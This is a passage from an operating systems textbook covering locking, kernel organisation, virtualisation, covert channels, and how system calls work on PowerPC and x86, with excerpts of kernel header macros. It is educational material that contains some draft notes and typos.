You can see how this is tied into the naming of the memory ordering semantics in the previous section.
We want to ensure that before we acquire a lock, no operations that should be protected by the lock are
re-ordered before it. This is how acquire semantics works.
Conversly, when we release the lock, we must be sure that every operation we have done whilst we held the
lock is complete (remember the example of updating the pointer previously?). This is release semantics.
There are many software libraries available that allow programmers to not have to worry about the details
of memory semantics and simply use the higher level of abstraction of lock() and unlock() .
Locking difficulties
Locking schemes make programming more complicated, as it is possible to deadlock programs. Imagine
if one processor is currently holding a lock over some data, and is currently waiting for a lock for some
other piece of data. If that other processor is waiting for the lock the first processor holds before unlocking
the second lock, we have a deadlock situation. Each processor is waiting for the other and neither can
continue without the others lock.
Often this situation arises because of a subtle race condition ; one of the hardest bugs to track down. If two
processors are relying on operations happening in a specific order in time, there is always the possiblity
of a race condition occuring. A gamma ray from an exploding star in a different galaxy might hit one of
the processors, making it skip a beat, throwing the ordering of operations out. What will often happen is a
deadlock situation like above. It is for this reason that program ordering needs to be ensured by semantics,
and not by relying on one time specific behaviours. (XXX not sure how i can better word that).
A similar situation is the oppostie of deadlock, called livelock. One strategy to avoid deadlock might be to
have a "polite" lock; one that you give up to anyone who asks. This politeness might cause two threads to
be constantly giving each other the lock, without either ever taking the lock long enough to get the critical
work done and be finished with the lock (a similar situation in real life might be two people who meet at
a door at the same time, both saying "no, you first, I insist". Neither ends up going through the door!).
Locking strategies
Underneath, there are many different strategies for implementing the behaviour of locks.
A simple lock that simply has two states - locked or unlocked, is refered to as a mutex (short for mutual
exclusion; that is if one person has it the other can not have it).
There are, however, a number of ways to implement a mutex lock. In the simplest case, we have what its
commonly called a spinlock. With this type of lock, the processor sits in a tight loop waiting to take the
lock; equivalent to it saying "can I have it now" constanly much as a young child might ask of a parent.
The problem with this strategy is that it essentially wastes time. Whilst the processor is sitting constanly
asking for the lock, it is not doing any useful work. For locks that are likely to be only held locked for a
Computer Architecture
55very short amount of time this may be appropriate, but in many cases the amount of time the lock is held
might be considerably longer.
Thus another strategy is to sleep on a lock. In this case, if the processor can not have the lock it will start
doing some other work, waiting for notification that the lock is available for use (we see in future chapters
how the operating system can switch processes and give the processsor more work to do).
A mutex is however just a special case of a semaphore , famously invented by the Dutch computer scientist
Dijkstra. In a case where there are multiple resources available, a semaphore can be set to count accesses
to the resources. In the case where the number of resources is one, you have a mutex. The operation of
semaphores can be detailed in any agorithms book.
These locking schemes still have some problems however. In many cases, most people only want to read
data which is updated only rarely. Having all the processors wanting to only read data require taking a
lock can lead to lock contention  where less work gets done because everyone is waiting to obtain the same
lock for some data.
Atomic Operations
Explain what it is.
56Chapter 4. The Operating System
The role of the operating system
The operating system underpins the entire operation of the modern computer.
Abstraction of hardware
The fundamental operation of the operating system (OS) is to abstract the hardware to the programmer and
user. The operating system provides generic interfaces to services provided by the underlying hardware.
In a world without operating systems, every programmer would need to know the most intimate details
of the underlying hardware to get anything to run. Worse still, their programs would not run on other
hardware, even if that hardware has only slight differences.
Multitasking
We expect modern computers to do many different things at once, and we need some way to arbitrate
between all the different programs running on the system. It is the operating systems job to allow this to
happen seamlessly.
The operating system is responsible for resource management  within the system. Many tasks will be
competing for the resources of the system as it runs, including processor time, memory, disk and user
input. The job of the operating system is to arbitrate these resources to the multiple tasks and allow them
access in an orderly fashion. You have probably experienced when this fails as it usually ends up with
your computer crashing (the famous "blue screen of death" for example).
Standardised Interfaces
Programmers want to write programs that will run on as many different hardware platforms as possible.
By having operating system support for standardised interfaces, programmers can get this functionality.
For example, if the function to open a file on one system is open(), on another is open_file()  and on
yet another openf()  programmers will have the dual problem of having to remember what each system
does and their programs will not work on multiple systems.
The Portable Operating System Interface (POSIX)1 is a very important standard implemented by UNIX
type operating systems. Microsoft Windows has similar proprietary standards.
1The X comes from Unix, from which the standard grew. Today, POSIX is the same thing as the Single UNIX Specification Version 3 or ISO/
IEC 9945:2002. This is a free standard, available online.
Once upon a time, the Single UNIX specification and the POSIX Standards were separate entities. The Single UNIX specification was released
by a consortium called the "Open Group", and was freely available as per their requirements. The latest version is The Single Unix Specification
Version 3.
The IEEE POSIX standards were released as IEEE Std 1003.[insert various years, revisions here], and were not freely available. The latest version
is IEEE 1003.1-2001 and is equivalent to the Single Unix Specification Version 3.
Thus finally the two separate standards were merged into what is known as the Single UNIX Specification Version 3, which is also standardised
by the ISO under ISO/IEC 9945:2002. This happened early in 2002. So when people talk about POSIX, SUS3 or ISO/IEC 9945:2002 they all
mean the same thing!
The Operating System
57Security
On multi-user systems, security is very important. As the arbitrator of access to the system the operating
system is responsible for ensuring that only those with the correct permissions can access resources.
For example if a file is owned by one user, another user should not be allowed to open and read it. However
there also need to be mechanisms to share that file safely between the users should they want it.
Operating systems are large and complex programs, and often security issues will be found. Often a virus
or worm will take advantage of these bugs to access resources it should not be allowed to, such as your
files or network connection; to fight them you must install patches or updates provided by your operating
system vendor.
Performance
As the operating system provides so many services to the computer, it's performance is critical. Many parts
of the operating system run extremely frequently, so even an overhead of just a few processor cycles can
add up to a big decrease in overall system performance.
The operating system needs to exploit the features of the underlying hardware to make sure it is getting the
best possible performance for the operations, and consequently systems programmers need to understand
the intimate details of the architecture they are building for.
In many cases the systems programmers job is about deciding on policies for the system. Often the case
that the side effects of making one part of the operating system run faster will make another part run slower
or less efficiently. Systems programmers need to understand all these trade offs when they are building
their operating system.
Operating System Organisation
The operating system is roughly organised as in the figure below.
The Operating System
58Figure 4.1. The Operating System
Task 1
Task n
KernelUserspaceTask 1
Drivers
Hardware
The organisation of the kernel. Processes the kernel is running live in userspace , and the kernel talks both
directly to hardware and through drivers.
The Kernel
The kernel is the operating system. As the figure illustrates, the kernel communicates to hardware both
directly and through drivers.
Just as the kernel abstracts the hardware to user programs, drivers abstract hardware to the kernel. For
example there are many different types of graphic card, each one with slightly different features. As long
as the kernel exports an API, people who have access to the specifications for the hardware can write
drivers to implement that API. This way the kernel can access many different types of hardware.
The kernel is generally what we called privileged . As you will learn, the hardware has important roles to
play in running multiple tasks and keeping the system secure, but these rules do not apply to the kernel. We
know that the kernel must handle programs that crash (remember it is the operating systems job arbitrate
The Operating System
59between multiple programs running on the same system, and there is no guarantee that they will behave),
but if any internal part of the operating system crashes chances are the entire system will become useless.
Similarly security issues can be exploited by user processes to escalate themselves to the privilege level
of the kernel; at that point they can access any part of the system completely unchecked.
Monolithic v Microkernels
One debate that is often comes up surrounding operating systems is whether the kernel should be a
microkernel  or monolithic .
The monolithic approach is the most common, as taken by most common Unixes (such as Linux). In
this model the core privileged kernel is large, containing hardware drivers, file system accesses controls,
permissions checking and services such as Network File System (NFS).
Since the kernel is always privileged, if any part of it crashes the whole system has the potential to comes
to a halt. If one driver has a bug it can overwrite any memory in the system with no problems, ultimately
causing the system to crash.
A microkernel architecture tries to minimise this possibility by making the privileged part of the kernel as
small as possible. This means that most of the system runs as unprivileged programs, limiting the harm
that any one crashing component can influence. For example, drivers for hardware can run in separate
processes, so if one goes astray it can not overwrite any memory but that allocated to it.
Whilst this sounds like the most obvious idea, the problem comes back two main issues
1.Performance is decreased. Talking between many different components can decrease performance.
2.It is slightly more difficult for the programmer.
Both of these criticisms come because to keep separation between components most microkernels are
implemented with a message passing  based system, commonly referred to as inter-process communication
or IPC. Communicating between individual components happens via discrete messages which must be
bundled up, sent to the other component, unbundled, operated upon, re-bundled up and sent back, and then
unbundled again to get the result.
This is a lot of steps for what might be a fairly simple request from a foreign component. Obviously one
request might make the other component do more requests of even more components, and the problem
can multiply. Slow message passing implementations were largely responsible for the poor performance
of early microkernel systems, and the concepts of passing messages are slightly harder for programmers
to program for. The enhanced protection from having components run separately was not sufficient to
overcome these hurdles in early microkernel systems, so they fell out of fashion.
In a monolithic kernel calls between components are simple function calls, as all programmers are familiar
with.
There is no definitive answer as to which is the best organisation, and it has started many arguments in
both academic and non-academic circles. Hopefully as you learn more about operating systems you will
be able to make up your own mind!
Modules
The Linux kernel implements a module system, where drivers can loaded into the running kernel "on the
fly" as they are required. This is good in that drivers, which make up a large part of operating system code,
are not loaded for devices that are not present in the system. Someone who wants to make the most generic
kernel possible (i.e. runs on lots of different hardware, such as RedHat or Debian) can include most drivers
as modules which are only loaded if the system it is running on has the hardware available.
The Operating System
60However, the modules are loaded directly in the privileged kernel and operate at the same privilege level
as the rest of the kernel, so the system is still considered a monolithic kernel.
Virtualisation
Closely related to kernel is the concept of virtualisation of hardware. Modern computers are very powerful,
and often it is useful to not thing of them as one whole system but split a single physical computer up
into separate "virtual" machines. Each of these virtual machines looks for all intents and purposes as a
completely separate machine, although physically they are all in the same box, in the same place.
Figure 4.2. The Operating System
Memory CPUs Disk
Memory CPUs Disk
Operating System
Operating SystemGuestOperating SystemGuestOperating SystemGuestOperating SystemGuestOperating SystemGuestOperating SystemGuest
Operating SystemGuest
ApplicationVirtual
HardwareOperating SystemGuest
ApplicationVirtual
HardwareMemory CPUs Disk
ApplicationHypervisorVirtual Machine Monitor
Some different virtualisation methods.
This can be organised in many different ways. In the simplest case, a small virtual machine monitor  can
run directly on the hardware and provide an interface to the guest operating systems running on top. This
VMM is often often called a hypervisor (from the word "supervisor")2. In fact, the operating system on
top may have no idea that the hypervisor is even there at all, as the hypervisor presents what appears to
be a complete system. It intercepts operations between the guest operating system and hardware and only
presents a subset of the system resources to each.
This is often used on large machines (with many CPUs and much RAM) to implement partitioning . This
means the machine can be split up into smaller virtual machines. Often you can allocate more resources
to running systems on the fly, as requirements dictate. The hypervisors on many large IBM machines are
actually quite complicated affairs, with many millions of lines of code. It provides a multitude of system
management services.
2In fact, the hypervisor shares much in common with a micro-kernel; both strive to be small layers to present the hardware in a safe fashion to
layers above it.
The Operating System
61Another option is to have the operating system aware of the underlying hypervisor, and request system
resources through it. This is sometimes referred to as paravirtualisation  due to it's halfway nature. This
is similar to the way early versions of the Xen system works and is a compromise solution. It hopefully
provides better performance since the operating system is explicitly asking for system resources from the
hypervisor when required, rather than the hypervisor having to work things out dynamically.
Finally, you may have a situation where an application running on top of the existing operating system
presents a virtualised system (including CPU, memory, BIOS, disk, etc) which a plain operating system
can run on. The application converts the requests to hardware through to the underlying hardware via the
existing operating system. This is similar to how VMWare works. This approach has many overheads,
as the application process has to emulate an entire system and convert everything to requests from the
underlying operating system. However, this lets you emulate an entirely different architecture all together,
as you can dynamically translate the instructions from one processor type to another (as the Rosetta system
does with Apple software which moved from the PowerPC processor to Intel based processors).
Performance is major concern when using any of these virtualisation techniques, as what was once fast
operations directly on hardware need to make their way through layers of abstraction.
Intel have discussed hardware support for virtualisation soon to be coming in their latest processors. These
extensions work by raising a special exception for operations that might require the intervention of a virtual
machine monitor. Thus the processor looks the same as a non-virtualised processor to the application
running on it, but when that application makes requests for resources that might be shared between other
guest operating systems the virtual machine monitor can be invoked.
This provides superior performance because the virtual machine monitor does not need to monitor every
operation to see if it is safe, but can wait until the processor notifies that something unsafe has happened.
Covert Channels
This is a digression, but an interesting security flaw relating to virtualised machines. If the partitioning of
the system is not static, but rather dynamic, there is a potential security issue involved.
In a dynamic system, resources are allocated to the operating systems running on top as required. Thus
if one is doing particularly CPU intensive operations whilst the other is waiting on data to come from
disks, more of the CPU power will be given to the first task. In a static system, each would get 50% an
the unused portion would go to waste.
Dynamic allocation actually opens up a communications channel between the two operating systems.
Anywhere that two states can be indicated is sufficient to communicate in binary. Imagine both systems
are extremely secure, and no information should be able to pass between one and the other, ever. Two
people with access could collude to pass information between themselves by writing two programs that
try to take large amounts of resources at the same time.
When one takes a large amount of memory there is less available for the other. If both keep track of the
maximum allocations, a bit of information can be transferred. Say they make a pact to check every second
if they can allocate this large amount of memory. If the target can, that is considered binary 0, and if it can
not (the other machine has all the memory), that is considered binary 1. A data rate of one bit per second
is not astounding, but information is flowing.
This is called a covert channel , and whilst admittedly far fetched there have been examples of security
breaches from such mechanisms. It just goes to show that the life of a systems programmer is never simple!
Userspace
We call the theoretical place where programs run by the user userspace . Each program runs in userspace,
talking to the kernel through system calls  (discussed below).
The Operating System
62As previously discussed, userspace is unprivileged . User programs can only do a limited range of things,
and should never be able to crash other programs, even if they crash themselves.
System Calls
Overview
System calls are how userspace programs interact with the kernel. The general principle behind how they
work is described below.
System call numbers
Each and every system call has a system call number  which is known by both the userspace and the kernel.
For example, both know that system call number 10 is open(), system call number 11 is read(), etc.
The Application Binary Interface  (ABI) is very similar to an API but rather than being for software is for
hardware. The API will define which register the system call number should be put in so the kernel can
find it when it is asked to do the system call.
Arguments
System calls are no good without arguments; for example open() needs to tell the kernel exactly what file
to open. Once again the ABI will define which registers arguments should be put into for the system call.
The trap
To actually perform the system call, there needs to be some way to communicate to the kernel we wish
to make a system call. All architectures define an instruction, usually called break or something similar,
that signals to the hardware we wish to make a system call.
Specifically, this instruction will tell the hardware to modify the instruction pointer to point to the kernels
system call handler (when the operating system sets its self up it tells the hardware where its system call
handler lives). So once the userspace calls the break instruction, it has lost control of the program and
passed it over to the kernel.
The rest of the operation is fairly straight forward. The kernel looks in the predefined register for the system
call number, and looks it up in a table to see which function it should call. This function is called, does what
it needs to do, and places it's return value into another register defined by the ABI as the return register.
The final step is for the kernel to make a jump instruction back to the userspace program, so it can continue
off where it left from. The userpsace program gets the data it needs from the return register, and continues
happily on it's way!
Although the details of the process can get quite hairy, this is basically all their is to a system call.
libc
Although you can do all of the above by hand for each system call, system libraries usually do most of the
work for you. The standard library that deals with system calls on UNIX like systems is libc; we will
learn more about it's roles in future weeks.
Analysing a system call
As the system libraries usually deal with making systems call for you, we need to do some low level
hacking to illustrate exactly how the system calls work.
The Operating System
63We will illustrate how probably the most simple system call, getpid() , works. This call takes no
arguments and returns the ID of the currently running program (or process; we'll look more at the process
in later weeks).
Example 4.1. getpid() example
  1 
                  #include <stdio.h>
    
    /* for syscall() */
  5 #include <sys/syscall.h>
    #include <unistd.h>
    
    /* system call numbers */
    #include <asm/unistd.h>
 10 
    void function(void)
    {
     int pid;
    
 15  pid = __syscall(__NR_getpid);
    }
    
                
We start by writing a small C program which we can start to illustrate the mechanism behind system calls.
The first thing to note is that there is a syscall  argument provided by the system libraries for directly
making system calls. This provides an easy way for programmers to directly make systems calls without
having to know the exact assembly language routines for making the call on their hardware. So why do we
use getpid()  at all? Firstly, it is much clearer to use a symbolic function name in your code. However,
more importantly, getpid()  may work in very different ways on different systems. For example, on
Linux the getpid()  call can be cached, so if it is run twice the system library will not take the penalty
of having to make an entire system call to find out the same information again.
By convention under Linux, system calls numbers are defined in the asm/unistd.h  file from the kernel
source. Being in the asm subdirectory, this is different for each architecture Linux runs on. Again by
convention, system calls numbers are given a #define  name consisting of __NR_. Thus you can see our
code will be making the getpid system call, storing the value in pid.
We will have a look at how several architectures implement this code under the hood. We're going to look
at real code, so things can get quite hairy. But stick with it -- this is exactly how your system works!
PowerPC
PowerPC is a RISC architecture common in older Apple computers, and the core of devices such as the
latest version of the Xbox.
Example 4.2. PowerPC system call example
  1 
                  
    /* On powerpc a system call basically clobbers the same registers like a
     * function call, with the exception of LR (which is needed for the
  5  * "sc; bnslr" sequence) and CR (where only CR0.SO is clobbered to signal
The Operating System
64     * an error return status).
     */
    
    #define __syscall_nr(nr, type, name, args...)    \
 10  unsigned long __sc_ret, __sc_err;    \
     {        \
      register unsigned long __sc_0  __asm__ ("r0");  \
      register unsigned long __sc_3  __asm__ ("r3");  \
      register unsigned long __sc_4  __asm__ ("r4");  \
 15   register unsigned long __sc_5  __asm__ ("r5");  \
      register unsigned long __sc_6  __asm__ ("r6");  \
      register unsigned long __sc_7  __asm__ ("r7");  \
             \
      __sc_loadargs_##nr(name, args);    \
 20   __asm__ __volatile__     \
       ("sc           \n\t"    \
        "mfcr %0      "    \
       : "=&r" (__sc_0),    \
         "=&r" (__sc_3),  "=&r" (__sc_4),  \
 25      "=&r" (__sc_5),  "=&r" (__sc_6),  \
         "=&r" (__sc_7)    \
       : __sc_asm_input_##nr    \
       : "cr0", "ctr", "memory",   \
         "r8", "r9", "r10","r11", "r12");  \
 30   __sc_ret = __sc_3;     \
      __sc_err = __sc_0;     \
     }        \
     if (__sc_err & 0x10000000)     \
     {        \
 35   errno = __sc_ret;     \
      __sc_ret = -1;      \
     }        \
     return (type) __sc_ret
    
 40 #define __sc_loadargs_0(name, dummy...)     \
     __sc_0 = __NR_##name
    #define __sc_loadargs_1(name, arg1)     \
     __sc_loadargs_0(name);      \
     __sc_3 = (unsigned long) (arg1)
 45 #define __sc_loadargs_2(name, arg1, arg2)    \
     __sc_loadargs_1(name, arg1);     \
     __sc_4 = (unsigned long) (arg2)
    #define __sc_loadargs_3(name, arg1, arg2, arg3)    \
     __sc_loadargs_2(name, arg1, arg2);    \
 50  __sc_5 = (unsigned long) (arg3)
    #define __sc_loadargs_4(name, arg1, arg2, arg3, arg4)   \
     __sc_loadargs_3(name, arg1, arg2, arg3);   \
     __sc_6 = (unsigned long) (arg4)
    #define __sc_loadargs_5(name, arg1, arg2, arg3, arg4, arg5)  \
 55  __sc_loadargs_4(name, arg1, arg2, arg3, arg4);   \
     __sc_7 = (unsigned long) (arg5)
    
    #define __sc_asm_input_0 "0" (__sc_0)
    #define __sc_asm_input_1 __sc_asm_input_0, "1" (__sc_3)
The Operating System
65 60 #define __sc_asm_input_2 __sc_asm_input_1, "2" (__sc_4)
    #define __sc_asm_input_3 __sc_asm_input_2, "3" (__sc_5)
    #define __sc_asm_input_4 __sc_asm_input_3, "4" (__sc_6)
    #define __sc_asm_input_5 __sc_asm_input_4, "5" (__sc_7)
    
 65 #define _syscall0(type,name)      \
    type name(void)        \
    {         \
     __syscall_nr(0, type, name);     \
    }
 70 
    #define _syscall1(type,name,type1,arg1)     \
    type name(type1 arg1)       \
    {         \
     __syscall_nr(1, type, name, arg1);    \
 75 }
    
    #define _syscall2(type,name,type1,arg1,type2,arg2)   \
    type name(type1 arg1, type2 arg2)     \
    {         \
 80  __syscall_nr(2, type, name, arg1, arg2);   \
    }
    
    #define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3)  \
    type name(type1 arg1, type2 arg2, type3 arg3)    \
 85 {         \
     __syscall_nr(3, type, name, arg1, arg2, arg3);   \
    }
    
    #define _syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
 90 type name(type1 arg1, type2 arg2, type3 arg3, type4 arg4)  \
    {         \
     __syscall_nr(4, type, name, arg1, arg2, arg3, arg4);  \
    }
    
 95 #define _syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4,type5,arg5) \
    type name(type1 arg1, type2 arg2, type3 arg3, type4 arg4, type5 arg5) \
    {         \
     __syscall_nr(5, type, name, arg1, arg2, arg3, arg4, arg5); \
    }
100 
                
This code snippet from the kernel header file asm/unistd.h  shows how we can implement system calls
on PowerPC. It looks very complicated, but it can be broken down step by step.
Firstly, jump to the end of the example where the _syscallN  macros are defined. You can see there
are many macros, each one taking progressively one more argument. We'll concentrate on the most
simple version, _syscall0  to start with. It only takes two arguments, the return type of the system
call (e.g. a C int or char, etc) and the name of the system call. For getpid this would be done as
_syscall0(int,getpid) .
Easy so far! We now have to start pulling apart __syscall_nr  macro. This is not dissimilar to where
we were before, we take the number of arguments as the first parameter, the type, name and then the actual
arguments.
The Operating System
66The first step is declaring some names for registers. What this essentially does is says __sc_0 refers
to r0 (i.e. register 0). The compiler will usually use registers how it wants, so it is important we give it
constraints so that it doesn't decide to go using register we need in some ad-hoc manner.
We then call sc_loadargs  with the interesting ## parameter. That is just a paste command, which gets
replaced by the nr variable. Thus for our example it expands to __sc_loadargs_0(name, args); .
__sc_loadargs  we can see below sets __sc_0 to be the system call number; notice the paste operator
again with the __NR_ prefix we talked about, and the variable name that refers to a specific register.
So, all this tricky looking code actually does is puts the system call number in register 0! Following the
code through, we can see that the other macros will place the system call arguments into r3 through r7
(you can only have a maximum of 5 arguments to your system call).
Now we are ready to tackle the __asm__  section. What we have here is called inline assembly  because
it is assembler code mixed right in with source code. The exact syntax is a little to complicated to go into
right here, but we can point out the important parts.
Just ignore the __volatile__  bit for now; it is telling the compiler that this code is unpredictable so
it shouldn't try and be clever with it. Again we'll start at the end and work backwards. All the stuff after
the colons is a way of communicating to the compiler about what the inline assembly is doing to the CPU
registers. The compiler needs to know so that it doesn't try using any of these registers in ways that might
cause a crash.
But the interesting part is the two assembly statements in the first argument. The one that does all the work
is the sc call. That's all you need to do to make your system call!
So what happens when this call is made? Well, the processor is interrupted knows to transfer control to a
specific piece of code setup at system boot time to handle interrupts. There are many interrupts; system
calls are just one. This code will then look in register 0 to find the system call number; it then looks up a
table and finds the right function to jump to to handle that system call. This function receives it's arguments
in registers 3 - 7.
So, what happens once the system call handler runs and completes? Control returns to the next instruction
after the sc, in this case a memory fence  instruction. What this essentially says is "make sure everything
is committed to memory"; remember how we talked about pipelines in the superscalar architecture? This
instruction ensures that everything we think has been written to memory actually has been, and isn't making
it's way through a pipeline somewhere.
Well, we're almost done! The only thing left is to return the value from the system call. We see that
__sc_ret  is set from r3 and __sc_err  is set from r0. This is interesting; what are these two values
all about?
One is the return value, and one is the error value. Why do we need two variables? System calls can fail,
just as any other function. The problem is that a system call can return any possible value; we can not
say "a negative value indicates failure" since a negative value might be perfectly acceptable for some
particular system call.
So our system call function, before returning, ensures its result is in register r3 and any error code is in
register r0. We check the error code to see if the top bit is set; this would indicate a negative number. If
so, we set the global errno value to it (this is the standard variable for getting error information on call
failure) and set the return to be -1. Of course, if a valid result is received we return it directly.
So our calling function should check the return value is not -1; if it is it can check errno to find the exact
reason why the call failed.
And that is an entire system call on a PowerPC!
The Operating System
67x86 system calls
Below we have the same interface as implemented for the x86 processor.
Example 4.3. x86 system call example
  1 
                  /* user-visible error numbers are in the range -1 - -124: see <asm-i386/errno.h> */
    
    #define __syscall_return(type, res)    \
  5 do {        \
            if ((unsigned long)(res) >= (unsigned long)(-125)) { \
                    errno = -(res);     \
                    res = -1;     \
            }       \
 10         return (type) (res);     \
    } while (0)
    
    /* XXX - _foo needs to be __foo, while __NR_bar could be _NR_bar. */
    #define _syscall0(type,name)   \
 15 type name(void)     \
    {      \
    long __res;     \
    __asm__ volatile ("int $0x80"   \
            : "=a" (__res)    \
 20         : "0" (__NR_##name));   \
    __syscall_return(type,__res);
    }
    
    #define _syscall1(type,name,type1,arg1)   \
 25 type name(type1 arg1)     \
    {       \
    long __res;      \
    __asm__ volatile ("int $0x80"    \
            : "=a" (__res)     \
 30         : "0" (__NR_##name),"b" ((long)(arg1))); \
    __syscall_return(type,__res);
    }
    
    #define _syscall2(type,name,type1,arg1,type2,arg2)   \
 35 type name(type1 arg1,type2 arg2)     \
    {         \
    long __res;        \
    __asm__ volatile ("int $0x80"      \
            : "=a" (__res)       \
 40         : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
    __syscall_return(type,__res);
    }
    
    #define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3)  \
 45 type name(type1 arg1,type2 arg2,type3 arg3)    \
    {         \
    long __res;        \
    __asm__ volatile ("int $0x80"      \
The Operating System
68            : "=a" (__res)       \
 50         : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
                      "d" ((long)(arg3)));     \
    __syscall_return(type,__res);      \
    }
    
 55 #define _syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
    type name (type1 arg1, type2 arg2, type3 arg3, type4 arg4)   \
    {          \
    long __res;         \
    __asm__ volatile ("int $0x80"       \
 60         : "=a" (__res)        \
            : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)),  \
              "d" ((long)(arg3)),"S" ((long)(arg4)));    \
    __syscall_return(type,__res);       \
    }
 65 
    #define _syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
              type5,arg5)        \
    type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5)  \
    {          \
 70 long __res;         \
    __asm__ volatile ("int $0x80"       \
            : "=a" (__res)        \
            : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)),  \
              "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)));  \
 75 __syscall_return(type,__res);       \
    }
    
    #define _syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4,   \
              type5,arg5,type6,arg6)        \
 80 type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6)   \
    {            \
    long __res;           \
    __asm__ volatile ("push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp" \
            : "=a" (__res)          \
 85         : "i" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)),    \
              "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)),    \
              "0" ((long)(arg6)));         \
    __syscall_return(type,__res);         \
    }
 90 
                
The x86 architecture is very different from the PowerPC that we looked at previously. The x86 is classed
as a CISC processor as opposed to the RISC PowerPC, and has dramatically less registers.
Start by looking at the most simple _syscall0  macro. It simply calls the int instruction with a value of
0x80. This instruction makes the CPU raise interrupt 0x80, which will jump to code that handles system
calls in the kernel.
We can start inspecting how to pass arguments with the longer macros. Notice how the PowerPC
implementation cascaded macros downwards, adding one argument per time. This implementation has
slightly more copied code, but is a little easier to follow.
The Operating System
69x86 register names are based around letters, rather than the numerical based register names of PowerPC.
We can see from the zero argument macro that only the A register gets loaded; from this we can tell that
the system call number is expected in the EAX register. As we start loading registers in the other macros
you can see the short names of the registers in the arguments to the __asm__  call.
We see something a little more interesting in __syscall6 , the macro taking 6 arguments. Notice the
push and pop instructions? These work with the stack on x86, "pushing" a value onto the top of the stack
in memory, and popping the value from the stack back into memory. Thus in the case of having six registers
we need to store the value of the ebp register in memory, put our argument in in (the mov instruction),
make our system call and then restore the original value into ebp. Here you can see the disadvantage of
not having enough registers; stores to memory are expensive so the more you can avoid them, the better.
Another thing you might notice there is nothing like the memory fence  instruction we saw previously with
the PowerPC. This is because on x86 the effect of all instructions will be guaranteed to be visible when
the complete. This is easier for the compiler (and programmer) to program for, but offers less flexibility.
The only thing left to contrast is the return value. On the PowerPC we had two registers with return values
from the kernel, one with the value and one with an error code. However on x86 we only have one return
value that is passed into __syscall_return . That macro casts the return value to unsigned long
and compares it to an (architecture and kernel dependent) range of negative values that might represent
error codes (note that the errno value is positive, so the negative result from the kernel is negated).
However, this means that system calls can not return small negative values, since they are indistinguishable
from error codes. Some system calls that have this requirement, such as getpriority() , add an offset
to their return value to force it to always be positive; it is up to the userspace to realise this and subtract
this constant value to get back to the "real" value.
Privileges
Hardware
We mentioned how one of the major tasks of the operating system is to implement security; that is to
not allow one application or user to interfere with any other that is running in the system. This means
applications should not be able to overwrite each others memory or files, and only access system resources
as dictated by system policy.
However, when an application is running it has exclusive use of the processor. We see how this works
when we examine processes in the next chapter. Ensuring the application only accesses memory it owns
is implemented by the virtual memory system, which we examine in the chapter after next. The essential
point is that the hardware is responsible for enforcing these rules.
The system call interface we have examined is the gateway to the application getting to system resources.
By forcing the application to request resources through a system call into the kernel, the kernel can enforce
rules about what sort of access can be provided. For example, when an application makes an open()
system call to open a file on disk, it will check the permissions of the user against the file permissions
and allow or deny access.
Privilege Levels
Hardware protection can usually be seen as a set of concentric rings around a core set of operations.
The Operating System
70Figure 4.3. Rings
Ring 0Ring 1Ring 2Ring n
Privilege levels on x86
In the inner most ring are the most protected instructions; those that only the kernel should be allowed
to call. For example, the HLT instruction to halt the processor should not be allowed to be run by a user
application, since it would stop the entire computer from working. However, the kernel needs to be able
to call this instruction when the computer is legitimately shut down.3
Each inner ring can access any instructions protected by a further out ring, but not any protected by a
further in ring. Not all architectures have multiple levels of rings as above, but most will either provide
for at least a "kernel" and "user" level.
3What happens when a "naughty" application calls that instruction anyway? The hardware will usually raise an exception, which will involve
jumping to a specified handler in the operating system similar to the system call handler. The operating system will then probably terminate the
program, usually giving the user some error about how the application has crashed.
The Operating System
71386 protection model
The 386 protection model has four rings, though most operating systems (such as Linux and Windows)
only use two of the rings to maintain compatibility with other architectures that do now allow as many
discrete protection levels.
386 maintains privileges by making each piece of application code running in the system have a small
descriptor, called a code descriptor , which describes, amongst other things, its privilege level. When
running application code makes a jump into some other code outside the region described by its code
descriptor, the privilege level of the target is checked. If it is higher than the currently running code, the
jump is disallowed by the hardware (and the application will crash).
Raising Privilege
Applications may only raise their privilege level by specific calls that allow it, such as the instruction
to implement a system call. These are usually referred to as a call gate because they function just as a
physical gate; a small entry through an otherwise impenetrable wall. When that instruction is called we
have seen how the hardware completely stops the running application and hands control over to the kernel.
The kernel must act as a gatekeeper; ensuring that nothing nasty is coming through the gate. This means
it must check system call arguments carefully to make sure it will not be fooled into doing anything it
shouldn't (if it can be, that is a security bug). As the kernel runs in the innermost ring, it has permissions
to do any operation it wants; when it is finished it will return control back to the application which will
again be running with it's lower privilege level.
Fast System Calls
One problem with traps as described above is that they are very expensive for the processor to implement.
There is a lot of state to be saved before context can switch. Modern processors have realised this overhead
and strive to reduce it.
To understand the call-gate mechanism described above requires investigation of the ingenious but
complicated segmentation scheme used by the processor. The original reason for segmentation was to be
able to use more than the 16 bits available in a register for an address, as illustrated in Figure 4.4, “x86
Segmentation Adressing” .
The Operating System
72Figure 4.4. x86 Segmentation Adressing
CODE
DATA
STACKCS:0x1000
DS:0x4000
64K (2^16)
SS:0x100002^0
2^20CPU
64KiB SegmentsADDRESS16 bits4 bits
20 bits (1MiB)SEGMENT
Segmentation expanding the address space of a processor by dividing it into chunks. The processor keeps
special segment registers, and addresses are specified by a segment register and offset combination. The
value of the segment register is added to the offset portion to find a final address.
When x86 moved to 32 bit registers, the segmentation scheme remained but in a different format. Rather
than fixed segment sizes, segments are allowed to be any size. This means the processor needs to keep track
of all these different segments and their sizes, which it does using descriptors . The segment descriptors
